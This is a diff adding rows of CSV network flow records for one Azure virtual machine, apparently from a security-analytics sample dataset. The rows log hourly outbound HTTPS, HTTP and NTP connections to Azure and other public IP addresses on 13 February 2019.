+804,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:01:36.000,2019-02-13 02:54:30.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+806,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:02:51.000,2019-02-13 02:54:03.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+807,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:08:43.000,2019-02-13 02:58:38.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+808,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:08:43.000,2019-02-13 02:58:38.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+809,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:08:43.000,2019-02-13 02:58:38.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,6.0
+805,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:23:43.000,2019-02-13 02:38:43.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+788,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:00:01.000,2019-02-13 03:55:33.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+791,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:11:07.000,2019-02-13 03:45:15.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+794,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:13:38.000,2019-02-13 03:58:39.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,8.0
+793,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:13:38.000,2019-02-13 03:58:39.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,8.0
+790,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:22:50.000,2019-02-13 03:22:50.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+792,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:53:10.000,2019-02-13 03:53:11.000,2019-02-13 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.81.200'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,72.21.81.200,2.0
+789,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:54:11.000,2019-02-13 03:54:11.000,2019-02-13 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+795,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:01:01.000,2019-02-13 04:55:12.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+798,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:02:19.000,2019-02-13 04:53:31.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+799,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:02:42.000,2019-02-13 04:22:43.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,2.0
+797,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:08:43.000,2019-02-13 04:08:43.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+802,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:12:49.000,2019-02-13 04:58:39.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '13.68.93.109', '40.77.228.69']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,13.68.93.109,9.0
+801,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:12:49.000,2019-02-13 04:58:39.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '13.68.93.109', '40.77.228.69']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,9.0
+803,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:12:49.000,2019-02-13 04:58:39.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '13.68.93.109', '40.77.228.69']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,9.0
+800,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:12:49.000,2019-02-13 04:58:39.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '13.68.93.109', '40.77.228.69']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+796,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:56:12.000,2019-02-13 04:56:12.000,2019-02-13 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.107.4.50'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,13.107.4.50,1.0
+772,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.239,2019-02-13 04:59:37.000,2019-02-13 05:59:10.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+780,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:08:43.000,2019-02-13 05:58:40.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,3.0
+779,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:08:43.000,2019-02-13 05:58:40.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,3.0
+775,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:10:35.000,2019-02-13 05:44:43.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+776,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:28:39.000,2019-02-13 05:43:40.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,2.0
+773,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:38:44.000,2019-02-13 05:38:44.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+774,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:46:50.000,2019-02-13 05:46:50.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+764,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.252,2019-02-13 06:01:47.000,2019-02-13 06:52:59.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+761,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.252,2019-02-13 06:04:34.000,2019-02-13 06:55:37.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+762,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.252,2019-02-13 06:10:31.000,2019-02-13 06:10:31.000,2019-02-13 07:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+768,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.267,2019-02-13 06:13:40.000,2019-02-13 06:58:41.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+767,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.267,2019-02-13 06:13:40.000,2019-02-13 06:58:41.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+765,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.267,2019-02-13 06:28:14.000,2019-02-13 06:28:14.000,2019-02-13 07:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.15.99,1.0
+763,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.252,2019-02-13 06:38:44.000,2019-02-13 06:53:44.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+766,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.267,2019-02-13 06:43:34.000,2019-02-13 06:43:34.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+769,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 08:23:31.719,2019-02-13 06:59:50.000,2019-02-13 07:56:33.000,2019-02-13 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+777,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 08:23:31.781,2019-02-13 07:08:51.000,2019-02-13 07:58:42.000,2019-02-13 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+778,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 08:23:31.781,2019-02-13 07:08:51.000,2019-02-13 07:58:42.000,2019-02-13 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+771,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 08:23:31.766,2019-02-13 07:10:03.000,2019-02-13 07:44:11.000,2019-02-13 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+756,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:01:15.000,2019-02-13 08:52:27.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+754,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:02:02.000,2019-02-13 08:57:49.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+755,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:08:44.000,2019-02-13 08:08:44.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+760,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:13:42.000,2019-02-13 08:58:42.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+758,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:13:42.000,2019-02-13 08:58:42.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+759,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:13:42.000,2019-02-13 08:58:42.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+757,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:28:42.000,2019-02-13 08:28:42.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+746,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:03:00.000,2019-02-13 09:55:59.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+748,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:09:31.000,2019-02-13 09:43:39.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+751,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:09:40.000,2019-02-13 09:09:40.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+753,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:13:42.000,2019-02-13 09:58:43.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+752,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:13:42.000,2019-02-13 09:58:43.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+749,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:28:42.000,2019-02-13 09:28:42.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+747,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:51:51.000,2019-02-13 09:51:51.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+750,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:53:10.000,2019-02-13 09:53:11.000,2019-02-13 10:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.81.200'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,72.21.81.200,2.0
+743,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:00:43.000,2019-02-13 10:51:55.000,2019-02-13 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+738,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:00:48.000,2019-02-13 10:56:03.000,2019-02-13 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+745,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:13:43.000,2019-02-13 10:58:43.000,2019-02-13 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+744,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:23:11.000,2019-02-13 10:23:11.000,2019-02-13 11:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['157.55.135.128'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,157.55.135.128,1.0
+742,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:23:11.000,2019-02-13 10:23:11.000,2019-02-13 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+729,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:01:07.000,2019-02-13 11:55:54.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+731,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:08:45.000,2019-02-13 11:08:45.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+736,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:08:51.000,2019-02-13 11:58:44.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+737,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:08:51.000,2019-02-13 11:58:44.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+732,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:08:59.000,2019-02-13 11:43:07.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+735,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:09:45.000,2019-02-13 11:09:45.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+730,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:13:39.000,2019-02-13 11:13:39.000,2019-02-13 12:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+733,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:28:52.000,2019-02-13 11:28:52.000,2019-02-13 12:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['172.217.15.99', '172.217.8.14']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,172.217.15.99,2.0
+734,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:28:52.000,2019-02-13 11:28:52.000,2019-02-13 12:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['172.217.15.99', '172.217.8.14']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,172.217.8.14,2.0
+721,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:00:11.000,2019-02-13 12:51:23.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+720,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:00:15.000,2019-02-13 12:15:22.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,5.0
+719,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:00:15.000,2019-02-13 12:15:22.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,centralus,eastus,13.89.220.65,5.0
+722,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:00:23.000,2019-02-13 12:57:43.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+726,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:08:45.000,2019-02-13 12:58:45.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+727,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:08:45.000,2019-02-13 12:58:45.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+728,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:08:45.000,2019-02-13 12:58:45.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,6.0
+724,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:29:45.000,2019-02-13 12:29:55.000,2019-02-13 13:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['205.185.216.42', '23.4.187.27']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,23.4.187.27,2.0
